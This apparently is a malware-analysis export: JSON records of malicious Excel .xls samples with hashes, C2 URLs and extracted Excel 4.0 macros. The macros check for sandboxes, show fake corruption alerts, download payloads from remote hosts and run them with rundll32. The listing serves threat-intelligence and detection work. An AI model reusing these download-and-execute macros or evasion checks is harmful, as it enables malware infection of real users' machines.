,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://studyshine.in/wp-cryn.php","https://arturkauf.pl/wp-cryn.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://studyshine.in/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://arturkauf.pl/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JcV1vcnkhl\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"40cfdc77a363fb83e93e9012ed18f59ed73a3fe334d7ef8ea77956baeabdf580"},"analysis":{"reported":"2020-04-09T16:15:58Z","score":10},"files":[{"filename":"40cfdc77a363fb83e93e9012ed18f59ed73a3fe334d7ef8ea77956baeabdf580","filesize":185344,"md5":"ffeff60f83d0ae43ea8058c3a6611f91","sha1":"717f76fe306780194ea201502149e38a772f239a","sha256":"40cfdc77a363fb83e93e9012ed18f59ed73a3fe334d7ef8ea77956baeabdf580","sha512":"5ec5050154035bde7a00dd6b3ac108e3ab65ce465bdffebfd913482227a6f5cfe9bcbfec213be499222cbc020972aa0e948edc46f811eba7f5be238a8cd39fea","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"40cfdc77a363fb83e93e9012ed18f59ed73a3fe334d7ef8ea77956baeabdf580.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"40d3ff9cd0662cab7578e5beb857a84fdd59f851a995d53ec6afec6c88427d66"},"analysis":{"reported":"2020-04-09T16:15:58Z","score":10},"files":[{"filename":"40d3ff9cd0662cab7578e5beb857a84fdd59f851a995d53ec6afec6c88427d66","filesize":170496,"md5":"d595ebf6d46c0c47a3aea6742fe40f86","sha1":"1e710b0623ce3b4ea51524205f6ec0afb36e68c2","sha256":"40d3ff9cd0662cab7578e5beb857a84fdd59f851a995d53ec6afec6c88427d66","sha512":"0b5c5cf5d44c3bbfc5276da2a621b31b7a1fa7fe47d0e8b97d6fb73dc9b73f9678f3c327db594c7af2e227d3e93f2e8bb05469e54fe4ad7b2a19809267241443","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"40d3ff9cd0662cab7578e5beb857a84fdd59f851a995d53ec6afec6c88427d66.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KQ0JY4JN4z\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4111e452fe315475ebf6c02f26a92f612467a28b72437d3c223aa6ef1db386c8"},"analysis":{"reported":"2020-04-09T16:15:58Z","score":10},"files":[{"filename":"4111e452fe315475ebf6c02f26a92f612467a28b72437d3c223aa6ef1db386c8","filesize":214016,"md5":"f5ba046cac0176fad976655cdcf57cfe","sha1":"16ca761cd023771a1a66aac9b66cc907ef372843","sha256":"4111e452fe315475ebf6c02f26a92f612467a28b72437d3c223aa6ef1db386c8","sha512":"6f8164a69ab9036c113742df9158e11532ace0a7fe3514b38374befbd93e043da15f9e5fdbe142eb6ae154e04baf25cc2d25bcce626f8404c31f508aa92317d0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4111e452fe315475ebf6c02f26a92f612467a28b72437d3c223aa6ef1db386c8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Uj2GGuDeAn\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4119e62bfb4af397687c0840a5bd95203c1b4ffed91300a74de335290277c029"},"analysis":{"reported":"2020-04-09T16:15:58Z","score":10},"files":[{"filename":"4119e62bfb4af397687c0840a5bd95203c1b4ffed91300a74de335290277c029","filesize":168448,"md5":"e51d99aec8abd306a550e0b9145e210c","sha1":"7a8300673d8b4010b6feb3628fcb61e7f87b7554","sha256":"4119e62bfb4af397687c0840a5bd95203c1b4ffed91300a74de335290277c029","sha512":"bcf8c7645fd77e57ba25e3a865dcdb294a84a73de649d27e0e57bc699335d5fd229a7b15be17da2d4f442f550bd58ecc45e28edd25107220f288ac5e467adf29","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4119e62bfb4af397687c0840a5bd95203c1b4ffed91300a74de335290277c029.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3PK8wL6ZJI\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"412fcc60a3047d720a2de51918204cf2c149b6870fc872b80f8747e105978327"},"analysis":{"reported":"2020-04-09T16:15:58Z","score":10},"files":[{"filename":"412fcc60a3047d720a2de51918204cf2c149b6870fc872b80f8747e105978327","filesize":185344,"md5":"382d543a0bf1ff6319f59ff4f6202e53","sha1":"dd0ab1794e1d3b7ebbc42ee29367240c1c666671","sha256":"412fcc60a3047d720a2de51918204cf2c149b6870fc872b80f8747e105978327","sha512":"fcda83d40b70fcee36ea53cf4dbbe60c30bdea394b05b13114a1efe105b0b3330849e9e4b3ee0876a7f8d93e18427236b9e1a29929562427f52b08210ee9433a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"412fcc60a3047d720a2de51918204cf2c149b6870fc872b80f8747e105978327.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4134f25d1768bf594a26fe21c547b143bf68c5cf59c225f73d8fa96f3b4c1788"},"analysis":{"reported":"2020-04-09T16:15:58Z","score":10},"files":[{"filename":"4134f25d1768bf594a26fe21c547b143bf68c5cf59c225f73d8fa96f3b4c1788","filesize":113664,"md5":"b25b9aace6b2cec9071bab7e9df6c712","sha1":"575b229b434eb7715289a78dc98fbc2b3d247314","sha256":"4134f25d1768bf594a26fe21c547b143bf68c5cf59c225f73d8fa96f3b4c1788","sha512":"3dbe9b0ef9dc2d62fbfc119b0595ca0ccc4a8806262208c638610cb089c8c8258b091b0839cb956be59635b665f7a02eab768a7b502221d655b675e613453d26","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4134f25d1768bf594a26fe21c547b143bf68c5cf59c225f73d8fa96f3b4c1788.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Hh0ymW604j\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"41520dc07cae103add705ea9a29d39c1956f87ebd5803d279adec7a306276946"},"analysis":{"reported":"2020-04-09T16:15:58Z","score":10},"files":[{"filename":"41520dc07cae103add705ea9a29d39c1956f87ebd5803d279adec7a306276946","filesize":185344,"md5":"7b15ba0fd839fe568db0d12671da18d3","sha1":"a054b9a46a00bcdea90a2d10217bc3593c17676d","sha256":"41520dc07cae103add705ea9a29d39c1956f87ebd5803d279adec7a306276946","sha512":"29358ef0716c655d3ddf8b20f06c3298fefba2453f57b03edc86fdc5ff32276e12840b2f20b7e86b578f922440c2c7b83e9215caa3c2edcff3e38ad7033a3122","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"41520dc07cae103add705ea9a29d39c1956f87ebd5803d279adec7a306276946.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4153e1c0fdf94e6606aedf7e8e17c9389031bbc158a665ec6d5fd87193a0289c"},"analysis":{"reported":"2020-04-09T16:15:58Z","score":10},"files":[{"filename":"4153e1c0fdf94e6606aedf7e8e17c9389031bbc158a665ec6d5fd87193a0289c","filesize":113152,"md5":"d3c687ce7c7756cde5836dad02489ece","sha1":"854713d8d6f825eb8c1035761daa6a13cec4095f","sha256":"4153e1c0fdf94e6606aedf7e8e17c9389031bbc158a665ec6d5fd87193a0289c","sha512":"f9a493222b836a3238431e37946ae701c37d3a937cc499acba7913e1753e867bbc2899158993b82ff33afd86d4b01e57bc79452a1992b9d9b4e855710dcdfe3d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4153e1c0fdf94e6606aedf7e8e17c9389031bbc158a665ec6d5fd87193a0289c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/vdjfvfs7871f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"7BvUWC9UVP\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"415c4553d88d6ef630d2453c7ea8a6761d17f7baf2ca9d9e27713027c16e8ad1"},"analysis":{"reported":"2020-04-09T16:15:58Z","score":10},"files":[{"filename":"415c4553d88d6ef630d2453c7ea8a6761d17f7baf2ca9d9e27713027c16e8ad1","filesize":168960,"md5":"a876487bbeb2f55ffe8bb633e3cbe0b6","sha1":"c9ec7f515687205d5516b577921e7da431d72183","sha256":"415c4553d88d6ef630d2453c7ea8a6761d17f7baf2ca9d9e27713027c16e8ad1","sha512":"24b97a86ecf279980cfead9489594a37d532ad07ad692b18b117ad7153df8fe124f7ba1bfb997b5ea2806b3737bc12118929ffc2bde51ecf57a55daf92471923","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"415c4553d88d6ef630d2453c7ea8a6761d17f7baf2ca9d9e27713027c16e8ad1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FZrWCzJ72a\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"416d05d6d8f35afb53f29c3c60c34fb80a7b1bacd67084127e35d41837093f51"},"analysis":{"reported":"2020-04-09T16:15:58Z","score":10},"files":[{"filename":"416d05d6d8f35afb53f29c3c60c34fb80a7b1bacd67084127e35d41837093f51","filesize":167936,"md5":"165ace996e7bc212fcc35d4004cb5fd3","sha1":"13ed6df0b0f330f0b6076b229335f236c5501971","sha256":"416d05d6d8f35afb53f29c3c60c34fb80a7b1bacd67084127e35d41837093f51","sha512":"d84bef46ee3fc45a5020321698f7c7e4d8368f32c107e9d508366103e391280315f80a9ab950d447b2a4e096fb68852a60b98b35edf62626bfe10900f7d0a4bf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"416d05d6d8f35afb53f29c3c60c34fb80a7b1bacd67084127e35d41837093f51.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5pzuVX8sLo\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4183fbd6565bb97a8275210ad4d3d89af8acd88e1179c8a5331a11be8b40d750"},"analysis":{"reported":"2020-04-09T16:15:59Z","score":10},"files":[{"filename":"4183fbd6565bb97a8275210ad4d3d89af8acd88e1179c8a5331a11be8b40d750","filesize":141824,"md5":"e2c14b7f8ba5b2e753ff9367a52a0471","sha1":"bf66b2462431b80f74d88e41d34fb5dfc8057d88","sha256":"4183fbd6565bb97a8275210ad4d3d89af8acd88e1179c8a5331a11be8b40d750","sha512":"0b0be3ea2cb49eccf27105c3a36b4205913b71e789f3361ca2634d7c00b24fc5a693fd22fefa3ecbaa559490230025442d0692aed182ff2bb56f4a8d6445cad0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4183fbd6565bb97a8275210ad4d3d89af8acd88e1179c8a5331a11be8b40d750.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://orruucsl.xyz/fdgareg34g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"RkYu8lJhVo\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"41848fa96adbeb9721c34af1db18cebba2555baa75405f96ecca79fa5bf0dff0"},"analysis":{"reported":"2020-04-09T16:15:59Z","score":10},"files":[{"filename":"41848fa96adbeb9721c34af1db18cebba2555baa75405f96ecca79fa5bf0dff0","filesize":163328,"md5":"f9721cc7a2c5619c0035c9716b88de8c","sha1":"b12bd1d8367a8a9083a063823d394b9cbf1df3b8","sha256":"41848fa96adbeb9721c34af1db18cebba2555baa75405f96ecca79fa5bf0dff0","sha512":"23d1b265b3884edf87e4ac19c91a34f33553d2bc852b3c8e844e9dc344ab0094bd91273f5a6149c741227653832bfcf846508102584c22100f38f3bf4f8d6aeb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"41848fa96adbeb9721c34af1db18cebba2555baa75405f96ecca79fa5bf0dff0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0Da6cHrGcp\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"418f82f41f6df18d28171c95f7e6f3de6d29e5c8af273c820fc04be8916c683e"},"analysis":{"reported":"2020-04-09T16:15:59Z","score":10},"files":[{"filename":"418f82f41f6df18d28171c95f7e6f3de6d29e5c8af273c820fc04be8916c683e","filesize":168960,"md5":"cc6fb0989c1fab80fcae496ba80af432","sha1":"73bf19f34781cfcf22c58566d764d11a5c9c29f6","sha256":"418f82f41f6df18d28171c95f7e6f3de6d29e5c8af273c820fc04be8916c683e","sha512":"6c811c93b9c75514e06342ce24cdadd38e9a515169a524ec4eb380dc1ebb04c1487348e5a9fbb0daf6d9bf210226533b8d23ea26665c1791fc3e486251161494","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"418f82f41f6df18d28171c95f7e6f3de6d29e5c8af273c820fc04be8916c683e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bHsXFLjgoU\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4191eec34fd91caff94f6cb791084be1bde208949634d894970b40b7e04b9c59"},"analysis":{"reported":"2020-04-09T16:15:59Z","score":10},"files":[{"filename":"4191eec34fd91caff94f6cb791084be1bde208949634d894970b40b7e04b9c59","filesize":214528,"md5":"d3a1f729cbd7b05bbc08c496f029d9e0","sha1":"bf24271b334a6eb953b1b09b8f32be1c3d68f518","sha256":"4191eec34fd91caff94f6cb791084be1bde208949634d894970b40b7e04b9c59","sha512":"44e3f3eae0e3bcbe098403ac3701f36d8571210063f1ad7d994e078651f8551f65ea332990fd3e9ba08467e983a9260c53b409b5c263f0673c325d3e861adbca","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4191eec34fd91caff94f6cb791084be1bde208949634d894970b40b7e04b9c59.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HXDDf4tmAb\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"419c6c04fc0829e24940e212c4f9fbd897d23ebfdcac4ca906d4bbbf181f1f27"},"analysis":{"reported":"2020-04-09T16:15:59Z","score":10},"files":[{"filename":"419c6c04fc0829e24940e212c4f9fbd897d23ebfdcac4ca906d4bbbf181f1f27","filesize":185344,"md5":"722618df64699f2ede9ab62e5fa97e0e","sha1":"4e938fd91ff2af735aff11860a83562d1f81e64f","sha256":"419c6c04fc0829e24940e212c4f9fbd897d23ebfdcac4ca906d4bbbf181f1f27","sha512":"d6acc04754be8003feaebc373ba9e281b23aadcbbd6f41b3aff47abebd0b82250ddbbd68795f75a4febac5cbc19fe94fa02d85a1d098388c9f3ed7362be46bae","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"419c6c04fc0829e24940e212c4f9fbd897d23ebfdcac4ca906d4bbbf181f1f27.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"41cc4ead9fafaa4313e2a7a03ad718ecceec8f0aeb990e3c4f58e25ca8361644"},"analysis":{"reported":"2020-04-09T16:15:59Z","score":10},"files":[{"filename":"41cc4ead9fafaa4313e2a7a03ad718ecceec8f0aeb990e3c4f58e25ca8361644","filesize":146944,"md5":"1b8cecc4e2a07b0b79289dfe1ff407b6","sha1":"54607ffccac36e88c675a1aba256614933919a52","sha256":"41cc4ead9fafaa4313e2a7a03ad718ecceec8f0aeb990e3c4f58e25ca8361644","sha512":"5b867250e27c059432634316c3544f840cc5503d94b1e67d4d1c66a6b03b27e93607ea5ae52763dab73d5f522fefde129db26492eb6ff25b092340e76aa9a477","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"41cc4ead9fafaa4313e2a7a03ad718ecceec8f0aeb990e3c4f58e25ca8361644.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM 